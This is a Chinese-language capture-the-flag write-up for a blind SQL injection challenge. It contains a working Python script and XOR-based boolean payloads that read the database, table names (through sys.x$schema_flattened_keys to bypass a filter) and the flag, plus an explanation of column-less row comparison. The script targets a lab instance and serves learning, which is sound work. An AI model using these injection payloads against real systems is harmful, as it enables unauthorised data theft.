- 布爾盲注
- 無列名注入
測試
- id=1 ==>Nu1L
- id=2 ==>V&N
- id=2-1 ==>Nu1L
貼一下腳本
# coding:utf-8 import requests import time url = 'http://14b858fa-e701-47da-a11a-304ef60eb42d.node3.buuoj.cn/' def str_hex(s): #十六進制轉換 fl ==> 0x666c res = '' for i in s: res += hex(ord(i)).replace('0x','') res = '0x' + res return res res = '' for i in range(1,200): print(i) left = 31 right = 127 mid = left + ((right - left)>>1) while left < right: #payload = '1^(ascii(substr(database(),{},1))>{})'.format(i,mid) #爆庫 #payload = '1^(ascii(substr((select group_concat(table_name) from sys.x$schema_flattened_keys),{},1))>{})'.format(i,mid) #爆表 #payload = '1^(ascii(substr((select group_concat(flag) from f1ag_1s_h3r3_hhhhh),{},1))>{})'.format(i,mid) #猜測f1ag_1s_h3r3_hhhhh中的列名為flag key = (str_hex(res+chr(mid))) payload = "1 ^ ( (select 1,{}) > (select * from f1ag_1s_h3r3_hhhhh))".format(key) data = { 'id':payload } r = requests.post(url = url, data = data) if r.status_code == 429: print('too fast') time.sleep(2) if 'Nu1L' in r.text: left = mid + 1 elif 'Nu1L' not in r.text: right = mid mid = left + ((right-left)>>1) if mid == 31 or mid == 127: break #res += chr(mid) #爆表 res += chr(mid-1) #爆flag print(str(mid),res) #give_grandpa_pa_pa_pa #news,users,f1ag_1s_h3r3_hhhhh,users233333333333333 #flag{8ebdb3ac-1d0e-47f3-82d5-ef5b4d20fe70}
因為or被過濾了,information_schema庫用不了,使用sys.x$schema_flattened_keys來爆表名
flag的獲取有兩種方法
第一種:
直接猜f1ag_1s_h3r3_hhhhh中的列名為flag
第二種:
爆破
關鍵payload
1 ^ ( (select 1,1) > (select * from f1ag_1s_h3r3_hhhhh))
這里的1用來探測列數,通過刪減1的個數來探測列的數量
1 ^ ( (select 1,'f') > (select * from f1ag_1s_h3r3_hhhhh))
原理:
- 按位去比較,如果爆破字符與flag的第一個字符相等,就向后繼續,大了小了都要繼續當前的循環,直到找到合適的字符
- 當小於等於f的時候,是1^0,回顯Nu1L,當大於f,即g之類的字符時,是1^1,返回Error Occured When Fetch Result.
- 所以最后的mid要減一才是正確的字符
- 這里我們傳入十六進制,mysql會自動將十六進制轉為字符
- mysql不區分大小寫,比較的時候O(0x4f)的ascii比f(0x66)的ascii小,但是比較的結果是O比f大
參考